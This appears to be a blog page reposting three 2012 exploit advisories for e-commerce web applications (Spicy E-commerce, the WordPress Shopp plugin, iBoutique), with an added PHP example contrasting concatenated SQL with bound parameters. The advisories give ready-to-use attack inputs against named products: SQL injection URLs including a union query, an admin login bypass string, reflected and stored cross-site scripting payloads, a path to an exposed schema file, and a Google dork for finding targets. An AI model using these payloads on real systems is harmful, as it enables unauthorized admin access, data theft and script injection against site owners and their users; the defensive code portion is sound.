MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

13 Oct 2012

Spicy E-commerce – SQL Injection Vulnerability

##########################################
# Exploit Title: Spicy E-commerce - SQL Injection Vulnerability
# Date: 2012-10-9
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database
# Software Link: http://www.spicywebtech.com/ecommerce_packages.php
# Category: webapps/php
# Google dork: O_o
# Demo: http://demo.spicywebtech.com/ecommerce/
##########################################
 
[#] SQL Injection:
/index.php parameter mPath, cPath
/details.php parameter proid
http://site.com/index.php?mPath='[SQLi]
http://site.com/index.php?cPath='[SQLi]
http://site.com/details.php?proid='[SQLi]
 
 
[#] Admin Auth Bypass:
/adminpanel/login_check.php
username: ' OR 'lol'='lol
password: ' OR 'lol'='lol
 
 
 
<----------------------------------------------------------------------------->
|              10x to: r00tw0rm members and Inj3ct0r Team:                    |
| r0073r * Sid3^effects * r4dc0re * CrosS * SeeMe * anT!-Tr0J4n * KedAns-Dz   |
| Angel Injection * NuxbieCyber * Sammy FORGIT * Taurus Omar * TUNISIAN CYBER |
<----------------------------------------------------------------------------->

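The `' OR 'lol'='lol` login input listed in the advisory above succeeds against a query built by string concatenation. The following is an added example, not part of the advisory or the product's code, showing that pattern beside a bound-parameter check. The table, columns, sample account and the use of PDO with in-memory SQLite are assumptions, since the source of `login_check.php` is not shown on the page.

```php
<?php
// Added example. Schema, account and query shape are assumptions,
// not code from the affected product.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO admin (username, pw_hash) VALUES (?, ?)');
// Constructed sample account.
$ins->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

// "Before": input is pasted into the SQL text, so a quote character in the
// input changes the structure of the WHERE clause instead of being data.
function login_concat(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT COUNT(*) FROM admin "
         . "WHERE username = '$user' AND pw_hash = '$pass'";
    return (int) $db->query($sql)->fetchColumn() > 0;
}

// "After": the username travels as a bound parameter and can only ever be
// compared as a value; the password is verified against the stored hash in
// PHP and never reaches the SQL text at all.
function login_bound(PDO $db, string $user, string $pass): bool
{
    $st = $db->prepare('SELECT pw_hash FROM admin WHERE username = :u');
    $st->execute([':u' => $user]);
    $hash = $st->fetchColumn();          // false when no such user
    return is_string($hash) && password_verify($pass, $hash);
}

$input = "' OR 'lol'='lol";              // value taken from the advisory

// The concatenated query accepts the advisory input as a valid login;
// the bound query rejects it and still accepts the real credentials.
var_dump(login_concat($db, $input, $input));
var_dump(login_bound($db, $input, $input));
var_dump(login_bound($db, 'admin', 'constructed-sample-password'));
```

The same bound-parameter approach applies to the `mPath`, `cPath` and `proid` request parameters listed in the advisory.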

9 Oct 2012

WordPress Shopp v1.0.17 eCommerce Plugin XSS/LFI Vulnerabilities

#### 
# Exploit Title: WordPress Shopp v1.0.17 - eCommerce Plugin <= (xSS/LFI) Multiple Vulnerabilities
# Author: T0x!c
# Date : 05/10/2012  
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork: inurl:"/gateways/2Checkout/"
# Download: http://www.scriptmafia.com/plugins/60186-shopp-v1017-ecommerce-plugin-for-wordpress.html
# Version: v1.0.17
# Tested on: [Windows 7]/
####
# Greetings tO: |KhalEd Ked'Ans| ^___^ I MiSS yOu br0thEr <3
 
#### P0c (1) Reflected xSS =>
-> http://127.0.0.1/Shopp_v1.0.17/core/ui/behaviors/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xSS");//
 
#### P0c (2) Access sensitive SQL file =>
->http://127.0.0.1/Shopp_v1.0.17/core/model/schema.sql
etc...
 
# - Special Thanks:
# ...:::' 1337day - Inj3ct0r TEAM ':::...


21 Jun 2012

iBoutique eCommerce v4.0 – Multiple Web Vulnerabilities

Proof of Concept:
=================
The SQL injection vulnerability can be exploited by remote attackers without user interaction. For demonstration or reproduce ...
 
1.1
http://127.0.0.1:1338/iboutique/index.php?page=en_Orders&OrderNumber=258'+/*!Union*/+/*!SelEct*/+1,2,3,4,version(),6,7,8,9,10--%20-
 
1.2
The persistent input validation vulnerabilities can be exploited by remote attackers with low required user interaction.
For demonstration or reproduce ...
 
The attacker creates an account and then changes his first name, last name, email, state, address, etc. to malicious HTML code.
To change the first name, the attacker needs to go to my area > my profile > edit profile, then inject malicious code, i.e., <iframe src=www.vuln-lab.com onload=alert("VL")/>
When the admin browses the payments page in the control panel, the persistent injected code will be executed out of the web context.
 
LINK : http://www.vulnerability-lab.com/get_content.php?id=594
